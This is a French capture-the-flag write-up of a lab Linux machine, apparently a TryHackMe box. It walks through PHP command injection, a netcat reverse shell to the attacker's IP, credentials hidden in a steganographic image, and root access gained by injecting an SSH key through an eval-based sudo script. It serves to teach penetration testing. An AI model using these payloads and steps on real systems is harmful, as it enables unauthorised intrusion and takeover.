# U.A. High School

`énumération` `sudo -l` `php`

* Nom machine : U.A. High School
* Difficulté : Facile
* OS : Linux

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-16 09:27 EDT
Nmap scan report for 10.10.108.93
Host is up (0.042s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

### HTTP (80)

Un scan diresearch nous mène vers /assets/ qui nous mène à une page blanche. Cela fait penser à une page php... Nous testons au hasard "assets/test.txt" et on nous renvoie "not found", si nous mettons index.php, on retrouve la page blage. Nous allons donc essayer différents paramètres php.

## Accès initial

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FPvikz5JInFoDZnusGRmN%2F22a337f3a4fcda630efca1c1ce4d300d.png?alt=media&#x26;token=c291181e-b0f9-48ed-b87f-cdb2127aaee5" alt=""><figcaption></figcaption></figure>

Ca marche ! Nous allons utiliser le payload : `rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.9.73.224%201234%20%3E%2Ftmp%2Ff` afin d'obtenir un reverse shell sur le port 1234

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234                     
listening on [any] 1234 ...
connect to [10.9.73.224] from (UNKNOWN) [10.10.51.222] 52986
bash: cannot set terminal process group (757): Inappropriate ioctl for device
bash: no job control in this shell
www-data@myheroacademia:/var/www/html/assets$ whoami
whoami
www-data
```

Nous allons regarder dans le repértoires var/www si nous ne trouvons pas des informations intéressantes.

```
www-data@myheroacademia:/var/www/Hidden_Content$ ls
ls
passphrase.txt
www-data@myheroacademia:/var/www/Hidden_Content$ cat *
cat *
QWxsbWlnaHRGb3JFdmVyISEhCg==
www-data@myheroacademia:/var/www/Hidden_Content$ cat passphrase.txt | base64 -d
</www/Hidden_Content$ cat passphrase.txt | base64 -d
AllmightForEver!!!
```

Le mot de passe ne nous est pas utile pour le moment. Nous continuons les rechers et téléchargons les images contenus dans /assets/images. Nous n'arrivons pas à les ouvrir via le navigateur car elles contiennent des erreurs.

```
www-data@myheroacademia:/var/www/html/assets/images$ ls
ls
oneforall.jpg  yuei.jpg

┌──(kali㉿kali)-[~/thm/school]
└─$ curl -O http://10.10.51.222/assets/images/oneforall.jpg
┌──(kali㉿kali)-[~/thm/school]
└─$ curl -O http://10.10.51.222/assets/images/yuei.jpg
```

Nous allons tenter d'extraire des données de ces fichiers.

```
┌──(kali㉿kali)-[~/thm/school]
└─$ steghide extract -sf oneforall.jpg
Enter passphrase: 
steghide: the file format of the file "oneforall.jpg" is not supported.
```

Nous allons tenter de le réparer avec hexeditor.&#x20;

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FTi8Wwe1PjyqdzwzrFGNU%2F0875a0725b194050a62a517eff3580eb.png?alt=media&#x26;token=b15565d4-552f-45a4-9102-b877278d9525" alt=""><figcaption></figcaption></figure>

{% embed url="<https://en.wikipedia.org/wiki/List_of_file_signatures>" %}

```
┌──(kali㉿kali)-[~/thm/school]
└─$ cat creds.txt                                     
Hi Deku, this is the only way I've found to give you your account credentials, as soon as you have them, delete this file:

deku:One?For?All_!!one1/A
```

```
www-data@myheroacademia:/var/www/html/assets/images$ su deku
su deku
Password: One?For?All_!!one1/A
```

## Elévation des privilèges

```
deku@myheroacademia:~$ sudo -l
sudo -l
[sudo] password for deku: One?For?All_!!one1/A

Matching Defaults entries for deku on myheroacademia:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User deku may run the following commands on myheroacademia:
    (ALL) /opt/NewComponent/feedback.sh
```

```
deku@myheroacademia:~$ cat /opt/NewComponent/feedback.sh
cat /opt/NewComponent/feedback.sh
#!/bin/bash

echo "Hello, Welcome to the Report Form       "
echo "This is a way to report various problems"
echo "    Developed by                        "
echo "        The Technical Department of U.A."

echo "Enter your feedback:"
read feedback


if [[ "$feedback" != *"\`"* && "$feedback" != *")"* && "$feedback" != *"\$("* && "$feedback" != *"|"* && "$feedback" != *"&"* && "$feedback" != *";"* && "$feedback" != *"?"* && "$feedback" != *"!"* && "$feedback" != *"\\"* ]]; then
    echo "It is This:"
    eval "echo $feedback"

    echo "$feedback" >> /var/log/feedback.txt
    echo "Feedback successfully saved."
else
    echo "Invalid input. Please provide a valid input." 
fi
```

{% embed url="<https://man7.org/linux/man-pages/man1/eval.1p.html>" %}

En outre, la commande eval construit une commande en concaténant des arguments. Ici, nous pouvons mettre ce que l'on veut dans la variable "feedback", hormis les nombreux caractères situés dans le if. Cependant ''>'' est accepté, nous pouvons donc modifier un fichier.

Nous allons créer une clef ssh, puis nous allons trasnférer le fichier .pub dans /root/authorized\_keys.

```
┌──(kali㉿kali)-[~/thm/school]
└─$ ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/kali/.ssh/id_ed25519): /home/kali/thm/school/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/thm/school/id_rsa
Your public key has been saved in /home/kali/thm/school/id_rsa.pub
The key fingerprint is:
SHA256:RLJSG+LvGIEcOYeYaneEKM4bgIvwrSx43alMALDe3oo kali@kali
The key's randomart image is:
+--[ED25519 256]--+
|+oooo + .        |
|O++=.+ *         |
|X+o+= o .        |
|==+..= .         |
|oo+=o...S        |
|o.= ++o          |
| o +.o.          |
|  . +            |
| E .             |
+----[SHA256]-----+
```

```
deku@myheroacademia:~$ sudo /opt/NewComponent/feedback.sh
sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form       
This is a way to report various problems
    Developed by                        
        The Technical Department of U.A.
Enter your feedback:
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJQxkRhO0zcKwM4WoLFI36gO7GcM1h7MRvK6qcuMwxjA kali@kali > /root/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJQxkRhO0zcKwM4WoLFI36gO7GcM1h7MRvK6qcuMwxjA kali@kali > /root/.ssh/authorized_keys
It is This:
Feedback successfully saved.
```

```
┌──(kali㉿kali)-[~/thm/school]
└─$ ssh root@10.10.175.181 -i id_rsa
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-153-generic x86_64)

Last login: Mon Sep 16 13:41:11 2024 from 10.9.73.224
root@myheroacademia:~# whoami
root
```

Nous sommes root !